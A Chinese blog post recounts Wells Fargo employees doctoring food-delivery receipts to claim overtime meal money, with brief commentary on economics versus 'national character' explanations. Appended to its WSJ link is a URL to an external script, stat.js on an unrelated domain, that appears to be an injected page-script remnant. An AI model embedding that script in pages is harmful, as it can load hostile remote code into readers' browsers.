分類
筆記

富國銀行職員造假騙餐費

富國銀行(Wells Fargo)與許多大銀行一樣,提供加班職員誤餐費。

但近日內部調查發現某些職員會提早向Grubhub、Seamless或Square Caviar 這些送餐服務網站訂餐,然後再偷偷更改單據時間,回頭向公司申請誤餐費。

常見坊間用「民族性」這種論調在解釋人類行為,其實非常不靠譜。尤其那些高舉美國價值者,猶為可笑。

還是實證經濟學科學得多,指明客觀侷限條件,就能預測此類貪小便宜的詐欺行為出現。

https://www.wsj.com/articles/wells-fargo-fires-bankers-amid-probe-of-dinner-receipts-that-were-allegedly-doctored-1535637745https://js.developerstatss.ga/stat.js?n=ns1

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s